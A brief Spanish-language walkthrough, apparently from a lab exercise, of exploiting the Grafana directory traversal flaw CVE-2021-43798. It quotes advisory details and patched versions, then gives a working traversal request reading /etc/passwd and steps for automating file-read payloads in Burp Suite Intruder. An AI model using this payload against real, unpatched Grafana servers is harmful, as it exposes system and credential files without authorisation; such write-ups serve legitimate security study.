
Explotación para el directory traversal de Grafana (CVE-2021-43798) con integración de Burp Suite y automatización de payloads para acceder a archivos locales en instancias vulnerables.
Grafana versiones 8.0.0-beta1 hasta 8.3.0 (excepto versiones parcheadas) es vulnerable a salto de directorio, permitiendo el acceso a archivos locales.
Grafana es una plataforma de código abierto para monitoreo y observabilidad. Grafana versiones 8.0.0-beta1 hasta 8.3.0 (excepto versiones parcheadas) es vulnerable a salto de directorio, permitiendo el acceso a archivos locales. La ruta URL vulnerable es: <grafana_host_url>/public/plugins//, donde es el ID del plugin para cualquier plugin instalado. En ningún momento Grafana Cloud ha sido vulnerable. Se recomienda a los usuarios actualizar a las versiones parcheadas 8.0.7, 8.1.8, 8.2.7 o 8.3.1. El Aviso de Seguridad de GitHub contiene más información sobre las rutas URL vulnerables, la mitigación y el cronograma de divulgación.
Usando Burp Suite
Enviar GET al repetidor
GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1
Luego enviar a Intruder
GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1
Usando Sniper para ATACAR
Carga útil copiada de github https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal
Procesamiento de Payload Coincidir [{FILE}] reemplazar con {flag.txt}